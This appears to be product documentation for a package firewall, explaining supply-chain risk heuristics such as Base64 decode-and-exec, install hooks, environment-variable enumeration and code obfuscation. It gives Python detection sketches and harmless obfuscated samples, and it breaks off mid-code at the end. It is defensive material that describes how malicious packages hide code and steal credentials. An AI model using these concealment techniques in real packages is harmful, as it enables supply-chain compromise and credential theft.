Analytics for Package Firewall
Package Firewall analytics use rules and heuristics to identify and assess potential security risks.
Bad author
Identifies authors known to distribute malicious software.
Importance
Software from this author shouldn’t be trusted.
Example
In July 2021, NPM removed a package published by an author using the name chrunlee. The package included a remote shell and password-stealing functionality. Over about two and a half years, users downloaded this and similar packages thousands of times.
Base64 decoding
Base64 decoding is a common technique in software development used to interpret data that’s been encoded in the Base64 format. This encoding method represents binary data as plain text so that it can be transmitted and stored safely in text-based formats. However, attackers often use Base64 encoding to hide malicious scripts, payloads, or links in open-source software. Because encoded content can appear harmless, it might evade detection. In some cases, malicious scripts are decoded and executed dynamically through functions such as exec(), which makes detection and static analysis more difficult.
Importance
Using Base64 decoding to execute encoded scripts poses a serious security risk. Attackers can use it to inject and run malicious code within trusted environments without immediate detection.
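As a rough illustration of the decode-and-execute pattern described above, the following Python sketch walks a module's syntax tree and reports calls to exec() or eval() whose argument contains a Base64 decoding call. The function name find_decoded_exec and the lists of decoder and executor names are assumptions made for this example; this is not the rule that Package Firewall itself applies.

```python
import ast

# Names treated as Base64 decoders and code executors in this sketch (assumptions).
DECODERS = {"b64decode", "urlsafe_b64decode", "standard_b64decode"}
EXECUTORS = {"exec", "eval"}


def _call_name(node: ast.Call) -> str:
    """Return the trailing name of a call target, e.g. 'b64decode' for base64.b64decode(...)."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def find_decoded_exec(source: str) -> list:
    """Return sorted line numbers where exec()/eval() receives Base64-decoded data."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and _call_name(node) in EXECUTORS):
            continue
        # Look for a decoder call anywhere inside the arguments of exec()/eval().
        nested_calls = (
            inner
            for arg in node.args
            for inner in ast.walk(arg)
            if isinstance(inner, ast.Call)
        )
        if any(_call_name(inner) in DECODERS for inner in nested_calls):
            hits.append(node.lineno)
    return sorted(hits)


# The sample is only parsed, never executed.
SAMPLE = '''import base64
exec(base64.b64decode("cHJpbnQoJ2hpJyk=").decode())
print("harmless")
'''

print(find_decoded_exec(SAMPLE))
```

The sketch only catches a decoder call nested directly inside the exec() or eval() call. Code that first stores the decoded value in a variable would need data-flow tracking, which is beyond this example.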
Bus factor
Per https://en.wikipedia.org/wiki/Bus_factor, "The 'bus factor' is the minimum number of team members who would need to become unavailable (for example, get hit by a bus) from a project before the project stalls due to lack of knowledgeable or competent personnel." Software is built by people who have their own lives and priorities and who won't be around forever. This comic illustrates the problem.
Importance
If a package is no longer maintained, security issues won’t be fixed, and the package won’t be updated as its environment changes. Over time, it may stop working as expected or become incompatible with newer systems.
Examples
- core-js provides a standard library for JavaScript and is maintained by one person. As of early 2023, it was used by at least 75 of the top 100 websites. See the maintainer's summary of the situation and request for help.
- cURL is the de facto standard program used to make network requests in Linux environments and is maintained by one person (see: https://onezero.medium.com/the-internet-relies-on-people-working-for-free-a79104a68bcc).
- left-pad was maintained by a single person, who deleted it because he felt that companies had taken advantage of his work. Some of the most-used JavaScript packages themselves used left-pad and were blocked when left-pad was removed.
Note that these projects have multiple contributors, who have written code that has been incorporated into the projects. What is notable is that each project has a single maintainer who owns the project, makes releases, and decides what to incorporate. If the maintainer stops working on the package, then progress on the package stops.
Cargo build file
In the Rust ecosystem, build.rs files are an important part of the build process managed by Cargo, Rust’s package manager. These build scripts run before the main build and run custom code for tasks such as compiling native libraries, generating bindings, or other setup operations. This feature provides flexibility and adaptability in Rust project builds.
Importance
Although build.rs files are useful, they can introduce security risks similar to those in other ecosystems that allow arbitrary code execution during package installation. A malicious build.rs script can run unauthorized commands and compromise the user’s system or data. Review and verify the source of any crate that includes a build script before using it.
Example
In August 2023, Phylum's automated risk detection identified a potential malware campaign leveraging the build.rs file in Rust packages. The scheme began with the release of several harmless, typosquatted packages which were later updated to include a mechanism for sending system information to a controlled Telegram channel. This early stage was crucial for uncovering the threat before it evolved into more harmful activities. For details on this campaign, see Phylum's blog post.
Compiled binary
A binary file is a computer file that isn’t a text file. Text files are human-readable and typically contain source code written by developers. A compiler converts that source code into a binary format that a computer can execute. Because binary files can’t be easily read or understood by humans, they are often referred to as non-human-readable files.
Importance
Binary files pose potential security risks because their contents can’t be easily inspected. Many legitimate source packages include compiled binaries for valid reasons, but binaries from unknown or untrusted sources should be treated with caution. They may contain malicious code or perform unauthorized actions.
Example
Anaconda is a popular Python distribution of scientific computing packages. It distributes binary files that are precompiled for common computing environments such as Windows, macOS, and Linux, and each of these binaries can be validated against a cryptographic hash provided by Anaconda. This is possible because each package is built from a specific release version, which fixes that package's source code at a specific point in time. Precompiled binaries are more than a convenience for users who would otherwise spend time and computing power compiling the source code themselves. At any time, a user can download a package's source code, compile it, and compare the cryptographic hash of the resulting binary with the hash from Anaconda's distribution to verify that the distributed binary is the exact result of compiling the package's source code.
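The hash comparison described above can be sketched in Python as follows. The text does not name a hash algorithm, so SHA-256 is an assumption here, and the helper names sha256_of_file and matches_published_hash are hypothetical.

```python
import hashlib
import hmac
from pathlib import Path


def sha256_of_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Compute the SHA-256 hex digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_published_hash(path: Path, published_hex: str) -> bool:
    """Return True if the file's digest equals the published hex digest.

    Surrounding whitespace and letter case in the published value are ignored.
    """
    expected = published_hex.strip().lower()
    return hmac.compare_digest(sha256_of_file(path), expected)
```

A caller would pass the path of the downloaded or locally compiled binary together with the hash published by the distributor. A locally compiled binary matches only if the build is reproducible, that is, if the same source and toolchain always produce byte-identical output.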
Dependency confusion
A dependency confusion attack can occur when a package that exists in a private registry is not also registered in a public package ecosystem. Many package managers check public registries before private ones when downloading and installing packages. If an attacker discovers the name of a package in a private registry, they can upload a malicious package with the same name to a public registry. As a result, developers may unintentionally install the attacker’s package instead of the trusted private one.
Importance
Dependency confusion attacks can be difficult to detect because they don’t rely on typos, unlike typosquatting attacks. Instead, they exploit misconfigured build systems that install a package of the correct name from the wrong registry. Without a clear understanding of your build pipeline or registry configuration, you might not realize that the wrong package has been installed.
Example
In early 2021, a bug bounty researcher built an early proof of concept of this type of attack and was able to successfully demonstrate execution of his code inside more than 35 different organizations.
Depends on malware
The Package Firewall threat feed is a curated list of packages identified by the firewall as malicious. The feed integrates with other parts of the threat-detection workflow. A common tactic among malware authors is to publish a malicious package, then release another package that depends on it. This approach helps them spread malware through transitive dependencies, particularly within large or established software projects. The risk increases when the dependency is introduced by an external contributor. Any package that includes, as a dependency, another package previously flagged as malicious by the firewall is marked with the "Depends on malware" issue.
Importance
Using a package that depends on another package identified as malware poses the same risk as directly installing the malicious package.
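To make the transitive case concrete, here is a minimal Python sketch that searches a dependency graph breadth-first and returns the chain leading to the first flagged package. The package names, the graph, and the threat feed contents are all hypothetical, and the real feed and resolver are not represented here.

```python
from collections import deque


def depends_on_malware(package, dependencies, threat_feed):
    """Return the dependency path from `package` to a flagged package, or None.

    `dependencies` maps a package name to the names it depends on directly.
    `threat_feed` is a set of package names flagged as malicious.
    """
    queue = deque([[package]])
    seen = {package}
    while queue:
        path = queue.popleft()
        for dep in dependencies.get(path[-1], ()):
            if dep in seen:
                continue
            if dep in threat_feed:
                return path + [dep]
            seen.add(dep)
            queue.append(path + [dep])
    return None


# Hypothetical dependency graph and threat feed, for illustration only.
DEPENDENCIES = {
    "app": ["web-utils", "logger"],
    "web-utils": ["color-helper"],
    "color-helper": ["evil-pkg"],
    "logger": [],
}
THREAT_FEED = {"evil-pkg"}

print(depends_on_malware("app", DEPENDENCIES, THREAT_FEED))
```

Returning the full path, rather than a yes or no answer, shows which direct dependency pulls in the flagged package.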
Deprecated package
In open-source software, a deprecated package is one that’s no longer supported, recommended, or maintained by its original developers. Although these packages may still be available, using them is strongly discouraged due to security and compatibility concerns.
Importance
Deprecated packages no longer receive updates or patches for bugs and security vulnerabilities. This lack of maintenance can create significant security risks and compatibility issues with newer operating systems and dependencies. Threat actors often target deprecated packages by exploiting known vulnerabilities to gain unauthorized access or cause harm. For this reason, using deprecated packages presents substantial risk in any software environment.
Environment variable enumeration
Environment variables are a key part of most operating systems. They store and provide configuration data at runtime to programs and applications.
Importance
Environment variables sometimes contain sensitive information such as access tokens (for example, AWS API keys) or local file paths (for example, LocalAppData). Malicious software running on a system may attempt to enumerate environment variables to locate and steal this data. This behavior poses a security risk, especially when environment variables are used to store credentials or other confidential information.
Example
In April 2022, researchers discovered a set of malicious packages on PyPI that would search through environment variables looking for the location of local browser storage folders. Once found, the aim of the malware was to steal AWS or other user credentials.
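One way to tell enumeration apart from an ordinary single-variable lookup is sketched below in Python. The sketch flags uses of os.environ as a whole (iteration, copying, or .items()) and ignores lookups of one named key. The function name find_env_enumeration and the choice of which accesses count as single-key are assumptions made for this example.

```python
import ast

# Methods on os.environ that read or write one named variable (assumption for this sketch).
SINGLE_KEY_METHODS = {"get", "pop", "setdefault"}


def _is_os_environ(node) -> bool:
    """True for the expression `os.environ`."""
    return (
        isinstance(node, ast.Attribute)
        and node.attr == "environ"
        and isinstance(node.value, ast.Name)
        and node.value.id == "os"
    )


def find_env_enumeration(source: str) -> list:
    """Return sorted line numbers where os.environ is used as a whole."""
    tree = ast.parse(source)
    single_key = set()  # ids of os.environ nodes used for a single-key access
    for node in ast.walk(tree):
        if isinstance(node, ast.Subscript) and _is_os_environ(node.value):
            single_key.add(id(node.value))
        elif (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Attribute)
            and node.func.attr in SINGLE_KEY_METHODS
            and _is_os_environ(node.func.value)
        ):
            single_key.add(id(node.func.value))
    return sorted(
        node.lineno
        for node in ast.walk(tree)
        if _is_os_environ(node) and id(node) not in single_key
    )


# The sample is only parsed, never executed.
SAMPLE = '''import os
home = os.environ.get("HOME")
token = os.environ["API_TOKEN"]
for name, value in os.environ.items():
    print(name, value)
'''

print(find_env_enumeration(SAMPLE))
```

The sketch does not follow aliases such as `from os import environ`, so it illustrates the idea and is not a complete detector.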
Ephemeral domain
A disposable email address is a temporary or easily discarded email account. Services such as Temp Mail, SimpleLogin, and 10MinuteMail provide disposable email addresses that aren’t meant for long-term or reliable communication.
Importance
Disposable email services have legitimate uses, such as temporary communication or signing up for low-risk websites or applications. However, using a disposable email address to register a public Git repository or distribute code may indicate an attempt to conceal malicious activity.
Example
In July 2022, a malicious cryptomining campaign was attempted by leveraging the NPM ecosystem. The threat actor created more than 1,200 JavaScript packages on NPM with more than 1,000 user accounts. Each of the accounts listed a different email address with a known disposable domain.
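A check of this kind can be sketched in a few lines of Python. The two domains listed are illustrative placeholders only. A real check would rely on a maintained list of disposable email domains, and the function names here are hypothetical.

```python
# Illustrative sample only; a real check would use a maintained list.
DISPOSABLE_DOMAINS = {"10minutemail.com", "temp-mail.org"}


def email_domain(address: str) -> str:
    """Return the lowercased domain part of an email address, or '' if there is none."""
    if "@" not in address:
        return ""
    return address.rsplit("@", 1)[1].strip().lower()


def uses_disposable_domain(address: str, disposable=DISPOSABLE_DOMAINS) -> bool:
    """True if the address's domain, or a parent domain, is on the disposable list."""
    domain = email_domain(address)
    if not domain:
        return False
    return any(domain == d or domain.endswith("." + d) for d in disposable)
```

Matching parent domains as well as exact domains covers services that hand out addresses on subdomains.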
Executes code at remote URL
A package that calls exec on code retrieved from a remote URL introduces both engineering and security risks. At runtime, it downloads source code from an external location and executes it locally.
Importance
Executing code hosted at a remote URL is fragile and unsafe. It’s not recommended for several reasons:
- The remotely executed code isn’t part of the package’s codebase, making it difficult for users to review or verify what’s being executed.
- Because the code isn’t shipped with the package, it’s often not subject to code review or maintained in source control.
- The actual author of the remote code may be unknown or unverified.
- The remote code can change at any time without requiring updates to the package itself.
- The code requires an active internet connection to download and run, which can fail in restricted or offline environments.
Example
In January 2023, Phylum witnessed a known prolific malware author group changing tactics to use the remote code execution technique. One of the many techniques this group previously used involved shipping highly obfuscated malware in the package itself. This is easy to spot because of the large chunk of obfuscated code. Shifting to the simple remote code execution technique not only greatly reduced the size of their malware footprint in the open source ecosystems, but it also greatly reduced the ability to identify the malware through visual inspection alone.
Expired author domains
Email addresses are commonly used as identifiers for authentication to package registries such as NPM and PyPI. An email address consists of a local part and a domain, separated by an @ sign. Domains are registered for a specific period (in effect, leased) and must be renewed to maintain ownership. If a domain registration expires, it can be purchased by a new owner. The new owner then controls all email addresses under that domain and can send or receive email, including password reset messages.
Importance
Using a software package from outside your organization involves a trade-off between control, security, and development efficiency. Because it’s not practical to review every line of external code, trust in the package’s authors is critical. If a malicious actor gains control of an author’s expired email domain, they can impersonate the original author and insert malicious code into the author’s packages. This risk makes domain ownership continuity an important factor in maintaining software supply chain security.
Example
In May 2022, a security researcher noticed that the NPM package foreach was controlled by a single maintainer whose email domain had expired. The researcher bought the domain and thus gained control of foreach. Because 36,826 other NPM projects used foreach as a dependency, the researcher could have inserted malware into foreach and transitively affected all of them.
High entropy blobs
In open-source software, high entropy blobs are segments of data within code that display a high degree of randomness. This pattern often indicates that the data is encoded or encrypted. These blobs are typically dense and complex, distinguishing them from standard code or predictable data.
High entropy data is often a sign of obfuscation techniques used to hide sensitive information such as encryption keys, credentials, or embedded malicious payloads. This approach helps conceal the true purpose of the data and can make analysis more difficult.
Importance
High entropy blobs can pose significant security risks. Threat actors often use them to hide malicious code within otherwise legitimate software packages. Because these blobs are designed to evade detection, they can prevent traditional security tools from identifying or analyzing the hidden content.
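Randomness of this kind is commonly measured with Shannon entropy, expressed in bits per byte. The Python sketch below computes it for a byte string. The threshold and minimum length in is_high_entropy are assumptions chosen for illustration, not values used by Package Firewall.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of `data` in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def is_high_entropy(data: bytes, threshold: float = 4.5, min_length: int = 32) -> bool:
    """Flag blobs that are long enough and exceed the entropy threshold.

    Both defaults are illustrative assumptions; very short strings are skipped
    because their entropy estimate is unreliable.
    """
    return len(data) >= min_length and shannon_entropy(data) > threshold
```

A string made of one repeated character scores 0 bits per byte, while data in which all 256 byte values appear equally often scores the maximum of 8. Ordinary source code usually falls in between, and encrypted or compressed data sits near the top of the range.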
Hostname identification
A hostname found in source code isn’t inherently suspicious or malicious. The hostname’s purpose and the context in which it appears determine whether it poses a risk.
Review hostnames in source code carefully to ensure that no malicious actor is attempting to connect to network resources that could deliver harmful content.
Importance
Hostnames can serve legitimate purposes, such as accessing APIs or internal services. However, they can also be used by malware to communicate with command-and-control servers or retrieve malicious payloads.
Example
Legitimate use of hostnames can sometimes be obvious. MathJax is a popular JavaScript engine for displaying math formulas in a browser. It should come as no surprise then to see the mathjax.org hostname in the package contents.
On the other hand, a ransomware attack in 2020 used a hardcoded hostname for the target.
Hostnames without a clear connection to a package’s functionality should be treated with suspicion until their legitimacy is established.
Invokes native code
Dynamic linking is the process by which an operating system loads external shared libraries and binds them to a running process. Many operating systems use shared native libraries that are dynamically linked to allow multiple processes to share a single instance of a library in memory. This approach optimizes memory usage and improves performance.
Importance
Function calls that load native code can have legitimate uses. However, packages that invoke native code may also load malicious binaries or perform actions associated with “living off the land.”
The term living off the land was introduced by Christopher Campbell and Matthew Graeber in their 2013 DerbyCon talk. It describes the use of legitimate, built-in binaries or scripts known as LOLBins to perform malicious actions. Such binaries may offer undocumented functionality that can be exploited by attackers, advanced persistent threats (APTs), or red teams.
A list of known LOLBins, libraries, and scripts is available at the LOLBAS project.
Open-source packages that call native code should be carefully reviewed. If the use of native code doesn’t align with the package’s intended functionality, the package should be considered untrustworthy and avoided.
Example
In Java, functions such as load, loadLibrary, and loadLibraryFromJar dynamically link a library to a process.
IP address identification
An IP address (short for Internet Protocol address) found in source code should be treated with caution. Hardcoded IP addresses can be used to bypass standard DNS lookups, which is a common technique in malicious software. Whether an IP address is considered malicious depends on its purpose and the context in which it appears in the code. IP addresses in source code should be reviewed carefully to ensure that they aren’t being used to connect to external resources that could deliver harmful or unauthorized content.
Importance
IP addresses can serve legitimate purposes, such as connecting to internal services or testing environments. However, they’re also commonly used in malware to communicate with command-and-control servers or to exfiltrate data.
Example
While legitimate uses exist, it is uncommon to include direct IP addresses in source code.
An example of a legitimate use is a developer directly including the IP address for a DNS server, such as Google at 8.8.8.8.
On the other hand, direct IP addresses in source code can be indicative of malicious intent. Analysis of a 2017 malware campaign (see this report from US-CERT) revealed actors hardcoding IP addresses that were used to connect victims to their malicious network infrastructure.
IP addresses without a clear connection to the code’s primary functionality should be treated with suspicion until their legitimacy is established.
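A first-pass review of this kind could start from a scan like the following Python sketch. It extracts IPv4 literals from source text and labels each as public or non-public using the standard ipaddress module. The function name and the two labels are assumptions for this example, and IPv6 is not covered.

```python
import ipaddress
import re

# Four dot-separated groups of 1-3 digits that are not part of a longer dotted number.
IPV4_CANDIDATE = re.compile(
    r"(?<!\d)(?<!\d\.)(?:\d{1,3}\.){3}\d{1,3}(?!\d)(?!\.\d)"
)


def find_ipv4_addresses(source: str) -> list:
    """Return (address, label) pairs for every valid IPv4 literal in `source`."""
    found = []
    for match in IPV4_CANDIDATE.finditer(source):
        try:
            address = ipaddress.IPv4Address(match.group())
        except ValueError:
            continue  # looks like an address but is out of range, e.g. 999.1.1.1
        label = "public" if address.is_global else "non-public"
        found.append((str(address), label))
    return found


SAMPLE = '''DNS_SERVER = "8.8.8.8"
LOCAL = "127.0.0.1"
BAD = "999.1.1.1"
VERSION = "1.2.3.4.5"
'''

print(find_ipv4_addresses(SAMPLE))
```

A pattern match like this cannot tell an address from a four-part version number, so each hit still needs the contextual review described above.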
License commercial risk
Software packages released under non-commercial licenses can pose risks for projects intended for commercial use. These licenses restrict software usage to non-profit activities and prohibit any commercial exploitation, including selling, sublicensing, or integrating the software into proprietary products.
When a package is distributed under a non-commercial license, it’s important to fully understand the terms and their implications. Non-compliance with license conditions can result in legal action, financial penalties, and reputational damage.
Importance
Using software governed by non-commercial licenses in a commercial environment can lead to serious legal and financial consequences. Organizations should identify and review all software licenses carefully to ensure compliance and reduce the risk of violations.
Example
Non-commercial licenses often have clauses that explicitly state the software cannot be used for commercial purposes. For instance, a package under the Creative Commons Non-Commercial (CC BY-NC) license prohibits using the software for any commercial purpose.
Consider the following scenario: a developer uses a library released under a non-commercial license in a proprietary application. This use case violates the terms of the license and could lead to legal disputes.
Source code distribution
Some open-source software licenses require that any derivative works or software incorporating the licensed code also be made available under the same license. In these cases, if you use, modify, or distribute the software, you must distribute your own source code under the same licensing terms.
These licenses promote transparency and collaboration by ensuring continued access to the software’s source code. However, they can conflict with commercial objectives, especially when a project involves proprietary or closed-source components.
Importance
Understanding and complying with source code distribution requirements is essential to avoid legal issues and uphold open-source licensing principles. Non-compliance can result in legal disputes or compel the release of proprietary code, potentially undermining commercial business models.
Example
Several licenses require source code distribution:
- AGPL (Affero General Public License): Software using AGPL-licensed code, including software accessed over a network, must be released under the AGPL, making the source code publicly accessible.
- GPL (General Public License): Requires derivative works to be open-sourced under the GPL, enforcing similar distribution obligations.
For instance, if you include a library released under the GPL in your proprietary application, you would be required to release your application’s source code under the GPL, making it publicly accessible and freely redistributable.
Malware bazaar check
MalwareBazaar is a public database that collects and shares known malware samples, enriched with community-driven threat intelligence. At Veracode, all files ingested from open-source packages are checked against MalwareBazaar’s repository of known malicious files. This comparison helps identify and flag components that match known malware signatures so potentially harmful files are detected before they cause damage.
Importance
Detecting a file that matches a known malware sample from MalwareBazaar is a critical security finding. Developers can use MalwareBazaar to investigate the file and review community intelligence to understand the nature and behavior of the identified malware.
Minimal code
Software with minimal code typically falls into one of two categories: packages that are trivially small or those composed primarily of binary artifacts.
A trivially small package may not provide enough functionality to justify the security risks associated with adopting external software. Such packages can also be more susceptible to compromise in future releases. In many cases, it may be safer and more efficient to implement the same functionality internally.
Packages that primarily contain binary artifacts offer limited transparency. While this isn’t inherently a problem, it means the software can’t be fully inspected. Although runtime behavior can be observed, the full capabilities and potential risks of the software remain unknown.
Importance
Organizations should adopt external software only when the benefits outweigh the risks. If the functionality provided by a package can be easily developed in-house, doing so may reduce exposure to security risks. When a package can’t be inspected, the organization should carefully evaluate whether the functionality it provides justifies the potential security concerns.
Example
In March 2016, a programmer removed all of his packages from the npm repository, including a trivial package called left-pad. Left-pad was used, either directly or indirectly, by several extremely popular packages, including Facebook's React, which is very widely used. When left-pad was removed from npm, all direct and indirect consumers were unable to build their software because the dependency package was no longer available.
NPM hooks
NPM scripts are commands defined in a package’s package.json file that can be executed at various stages of the package lifecycle, including installation, testing, and deployment.
These scripts are commonly used to automate tasks such as running tests, building code, or performing setup operations. However, because NPM scripts can execute arbitrary code during installation, they present security risks if not reviewed.
Importance
While NPM scripts are a powerful tool for package management and automation, they can also be exploited to execute malicious commands without the user’s knowledge. Review and validate any commands in the scripts section of package.json before installation to ensure they do not perform unsafe or unauthorized actions.
Example
In October 2022, Phylum detected a typosquatting attack on the NPM ecosystem that targeted over 120 high-profile packages, including tslib, ignore, and anymatch. At the time of the attack, these packages accounted for over 1.2 billion weekly downloads, a very large attack surface that reached a huge number of developers. During installation, a preinstall hook in the package.json file automatically executed the malicious code contained in each package's index.js file.
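To review install-time scripts before installing a package, the scripts section of package.json can be inspected directly. The Python sketch below lists the preinstall, install, and postinstall entries of a manifest. The sample manifest and the function name install_hooks are hypothetical, and the sketch deliberately limits itself to these three lifecycle scripts.

```python
import json

# Lifecycle scripts that npm runs automatically when a package is installed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def install_hooks(package_json_text: str) -> dict:
    """Return the install-time lifecycle scripts declared in a package.json document."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    return {name: scripts[name] for name in INSTALL_HOOKS if name in scripts}


# Hypothetical manifest for illustration.
SAMPLE_MANIFEST = """
{
  "name": "example-pkg",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "node index.js",
    "test": "jest"
  }
}
"""

print(install_hooks(SAMPLE_MANIFEST))
```

An empty result means the manifest declares none of these three hooks. It does not by itself show that the package is safe.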
NPM security holding
An npm security holding package, typically released with the version number 0.0.1-security, is a placeholder published by npm to replace a package that has been removed from the registry for security reasons. This placeholder prevents malicious actors from reusing the original package name and alerts users that earlier versions may have contained security vulnerabilities or malicious code.
Importance
The presence of an npm security holding package indicates that the original package has been deprecated due to critical security concerns and should not be used. Developers who discover that their projects depend on such a package should assume the system might be compromised. Immediate action should be taken to remove the package, review dependency chains, and perform a thorough security audit to ensure no residual malicious code remains.
NuGet install scripts
In the NuGet package management system, install scripts such as tools/init.ps1 and tools/install.ps1 are PowerShell scripts executed during the installation of a NuGet package. These scripts are designed to perform setup tasks such as configuring settings, adjusting permissions, or installing additional components required by the package. This automation facilitates the seamless integration of packages into larger projects.
Importance
While NuGet install scripts provide significant convenience by automating complex installation processes, they also introduce security risks by executing arbitrary PowerShell code during package installation. This can be exploited by malicious actors to execute unauthorized code, potentially leading to system compromise or data breaches. Inspect the source and contents of any NuGet package that includes install scripts, ensuring that they come from trustworthy sources and do not contain malicious code.
Obfuscated JavaScript
In software development, code obfuscation is the intentional process of making source code difficult for humans to read or interpret. Obfuscation is often used to conceal the true purpose or functionality of the code.
For example, the following JavaScript function simply prints “Hello World!” to the console:
function hi() {
    console.log("Hello World!");
}
hi();
Published in this form, the code's behavior is obvious to most developers. However, after being run through an obfuscation tool, the same code looks like this:
(function(_0x26f70c,_0x4e6c92){var _0x3a9801=_0x4e03,_0x3e81f1=_0x26f70c();while(!![]){try{var _0x57c30a=parseInt(_0x3a9801(0x1e0))/0x1+-parseInt(_0x3a9801(0x1e1))/0x2*(parseInt(_0x3a9801(0x1e5))/0x3)+parseInt(_0x3a9801(0x1e7))/0x4+parseInt(_0x3a9801(0x1e4))/0x5+-parseInt(_0x3a9801(0x1ea))/0x6*(-parseInt(_0x3a9801(0x1e2))/0x7)+parseInt(_0x3a9801(0x1e6))/0x8*(-parseInt(_0x3a9801(0x1e9))/0x9)+-parseInt(_0x3a9801(0x1df))/0xa;if(_0x57c30a===_0x4e6c92)break;else _0x3e81f1['push'](_0x3e81f1['shift']());}catch(_0x5a2b26){_0x3e81f1['push'](_0x3e81f1['shift']());}}}(_0x3d1f,0xe9b9d));function _0x4e03(_0x55d606,_0x54117d){var _0x3d1f03=_0x3d1f();return _0x4e03=function(_0x4e031b,_0x106628){_0x4e031b=_0x4e031b-0x1df;var _0x5e4b7c=_0x3d1f03[_0x4e031b];return _0x5e4b7c;},_0x4e03(_0x55d606,_0x54117d);}function hi(){var _0x572c2c=_0x4e03;console[_0x572c2c(0x1e3)](_0x572c2c(0x1e8));}function _0x3d1f(){var _0x2c862a=['3988352DxkmDj','632512SZNfDd','Hello\x20World!','9NtNzQn','6WfYOmz','18643720nibnLE','1667797VhclOj','702KafXLL','13084400HKrzBf','log','145665eGCCHn','3453BajacZ'];_0x3d1f=function(){return _0x2c862a;};return _0x3d1f();}hi();
Without significant time and effort, it's impossible to tell what this code is doing by just looking at it.
Importance
Although code obfuscation has a few legitimate use cases, obfuscated code in the open source ecosystem is noteworthy because it is atypical and runs counter to the spirit and purpose of the open source software community. Treat it with caution, because it could be hiding malicious intent.
Example
In the summer of 2022, researchers published details of a supply-chain attack on the NPM ecosystem that dated back to December 2021. In this campaign, dubbed IconBurst, threat actors used typosquatting to distribute malicious and obfuscated JavaScript packages. Once installed, these packages stole login credentials from embedded website forms. Even though the source code for these packages was publicly available, the obfuscation prevented users from recognizing its malicious intent.
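The obfuscated sample shown earlier in this section is dominated by machine-generated names such as _0x3a9801. As a rough heuristic, the Python sketch below measures what fraction of identifier-like tokens in a JavaScript source follow that naming pattern. The tokenization is deliberately crude (it also counts keywords and words inside strings), and the function name and any cutoff applied to the ratio are assumptions.

```python
import re

# Identifier-like tokens that do not start in the middle of a number or another name.
IDENTIFIER = re.compile(r"(?<![A-Za-z0-9_$])[A-Za-z_$][A-Za-z0-9_$]*")
# Names of the form _0x followed by at least four hex digits.
HEX_NAME = re.compile(r"_0x[0-9a-fA-F]{4,}")


def hex_identifier_ratio(js_source: str) -> float:
    """Return the fraction of identifier-like tokens that look like _0x hex names."""
    names = IDENTIFIER.findall(js_source)
    if not names:
        return 0.0
    hex_names = sum(1 for name in names if HEX_NAME.fullmatch(name))
    return hex_names / len(names)


CLEAR = 'function hi() {\n    console.log("Hello World!");\n}\nhi();'
OBFUSCATED = "var _0x3a9801=_0x4e03,_0x3e81f1=_0x26f70c();"

print(hex_identifier_ratio(CLEAR), hex_identifier_ratio(OBFUSCATED))
```

This heuristic recognizes only one family of obfuscator output. Other tools produce different patterns, so a low ratio is not evidence that code is unobfuscated.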
Obfuscated Python
In software development, code obfuscation is the act of deliberately making source code difficult for humans to read or understand with the ultimate purpose of trying to conceal what the code is doing.
For example, here is a small snippet of what obfuscated Python code might look like:
def ___________________(__________, ___________):
    __________=__________.decode()
    _________=""
    if not ___________[False]=="\x20":
        ___________="\40"+___________
    for _ in range(_____("\154\x65\156\50\137\137\137\137\137\137\x5f\137\x5f\x5f\51")):
        _________+=_____("\143\150\162\x28\x6f\x72\x64\x28\137\x5f\137\x5f\x5f\137\137\137\x5f\137\133\137\x5d\51\136\x6f\162\144\x28\137\x5f\137\x5f\x5f\137\x5f\137\137\x5f\x5f\x5b\x28\154\145\156\x28\137\x5f\137\x5f\x5f\x5f\137\137\x5f\137\x5f\51\x20\55\x20\124\162\x75\145\x2a\x32\x29\40\53\40\x54\162\165\145\135\x29\51")
    return (_________,___________)
Without significant time and effort, it's impossible to tell what this code is doing by just looking at it.
Importance
Finding obfuscated code in the open source ecosystem is noteworthy because it is atypical and goes against the grain of the spirit and purpose of the open source software community. If found, it should be treated with caution because it could be hiding malicious intent.
Example
In the fall of 2022, Phylum published details of a supply-chain attack on the PyPI ecosystem in which threat actors made sophisticated attempts to deploy W4SP Stealer onto Python developers’ machines. In this campaign, the attackers used typosquatting to distribute malicious and highly obfuscated Python packages. Once installed, these packages stole login credentials, cryptocurrency wallets, browser cookies, and other sensitive data. Even though the source code for these packages was publicly available, the obfuscation prevented users from recognizing its malicious intent.
Unverifiable dependency
Package installers typically download dependencies from official registries based on the package name and version specified in the manifest file. These dependencies are verifiable because their source, version, and integrity can be validated against the registry.
However, many package managers also support installing dependencies directly from external sources such as Git repositories, Gists, or URLs. Dependencies retrieved from these external sources are considered unverifiable because you cannot reliably ensure that the referenced package remains unchanged or originates from a trusted source.
Importance
Treat code from unverified or unknown sources with caution until you confirm its origin and integrity. Unverifiable dependencies introduce risk because they offer no assurance that the installed package matches the intended version or content. That uncertainty increases the likelihood of tampering, supply-chain compromise, or the unintentional inclusion of malicious code.
Example
In the npm ecosystem, the package.json file lists the package’s dependencies (see the documentation for details). npm supports multiple ways to specify dependencies, including URLs as dependencies, git URLs, GitHub URLs, and local paths.
A contrived package on npm lists "react": "git://github.com/facebook/react.git" as a dependency. Whatever code exists at that location at install time is imported as the dependency, and this reference alone does not guarantee that the intended version of react will be used.
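Dependency specifiers like the one above can be found mechanically. The following Python sketch scans the dependency sections of a package.json document and flags values that point to git URLs, HTTP(S) URLs, GitHub shorthand, or local paths instead of a registry version or range. The prefix list, the shorthand pattern, and the sample manifest are assumptions made for this example and do not cover every form npm accepts.

```python
import json
import re

# Specifier prefixes treated as non-registry sources in this sketch (assumption).
REMOTE_PREFIXES = (
    "git://", "git+ssh://", "git+http://", "git+https://", "git+file://",
    "http://", "https://", "github:", "file:",
)
# GitHub shorthand such as "user/repo" or "user/repo#branch".
GITHUB_SHORTHAND = re.compile(r"^[\w.-]+/[\w.-]+(#.+)?$")
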